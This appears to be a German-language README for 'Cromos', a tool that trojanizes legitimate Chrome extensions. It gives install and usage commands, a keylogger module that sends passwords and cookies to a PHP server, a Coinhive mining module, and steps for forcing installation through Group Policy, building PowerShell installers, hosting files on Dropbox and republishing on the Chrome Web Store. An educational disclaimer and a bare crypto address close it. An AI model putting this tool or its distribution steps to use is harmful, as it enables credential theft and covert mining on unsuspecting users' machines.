
Cromos ist ein Werkzeug zum Herunterladen legitimer Erweiterungen des Chrome Web Store und zum Einschleusen von Code in den Hintergrund der Anwendung.
Cromos ist ein Tool zum Herunterladen legitimer Erweiterungen des Chrome Web Store und zum Injizieren von Code im Hintergrund der Anwendung. Darüber hinaus erstellt Cromos ausführbare Dateien, um die Installation per PowerShell zu erzwingen, und lädt Dateien auf Dropbox hoch, um die bösartigen Dateien zu hosten.
Dies ist eine Demonstration des Tools in Aktion. In diesem Beispiel lade ich eine bekannte Google-Erweiterung namens G Suite Training aus dem Google Chrome Web Store herunter und injiziere ein Keylogger-Modul.
$ cd $HOME/
$ git clone https://github.com/fbctf/cromos
$ sudo chmod -R 777 cromos/
$ cd cromos && python setup.py
Usage: python cromos.py --extension {id}
Usage: python cromos.py --extension {id} --load {currency/keylogger}
Usage: python cromos.py --extension {id} --build {bat} --token {dropboxToken}
Sie können auch einige vordefinierte Module im Hintergrund injizieren, wie Keylogger, virtuelle Währung.
| Modul | Beschreibung |
|---|---|
| modules/keylogger | Dieses Modul erfasst alle Passwörter, die Sie in einem infizierten Browser über https oder nicht eingeben. Sie benötigen lediglich einen PHP-Server, um die Anfragen zu empfangen. Die Parameter sind email, password, cookies und userAgent. |
| modules/currency | Dieses Modul ermöglicht es Ihnen, mit der Coinhive-API virtuelle Münzen zu schürfen. Sie benötigen lediglich ein Konto. |
Chrome ermöglicht es Ihnen, Erweiterungen mithilfe des Windows Group Policy Objects (GPO) hinzuzufügen. Wenn Sie die Installation auf mehreren Maschinen erzwingen müssen, befolgen Sie einfach die Schritte im Chrome Deployment Guide . Ändern Sie dann die ursprüngliche Erweiterung mit wenigen Modifikationen. Sie können Ihre Erweiterung im Chrome Web Store veröffentlichen, was eine Zahlung von 5 $ erfordert.
Code-Beispiele werden zu Bildungszwecken bereitgestellt. Angemessene Verteidigungsmaßnahmen können nur durch die Erforschung von Angriffstechniken entwickelt werden, die böswilligen Akteuren zur Verfügung stehen. Die Verwendung dieses Codes gegen Zielsysteme ohne vorherige Genehmigung ist in den meisten Rechtsordnungen illegal. Die Autoren haften nicht für Schäden, die durch Missbrauch dieser Informationen oder dieses Codes entstehen.
49m12JEEC6HPCHkLMX5QL4SrDQdKwh6eb4Muu8Z9CwA9MwemhzFQ3VcgHwyuR73rC22WCymTUyep7DVrfN3GPt5JBCekPrR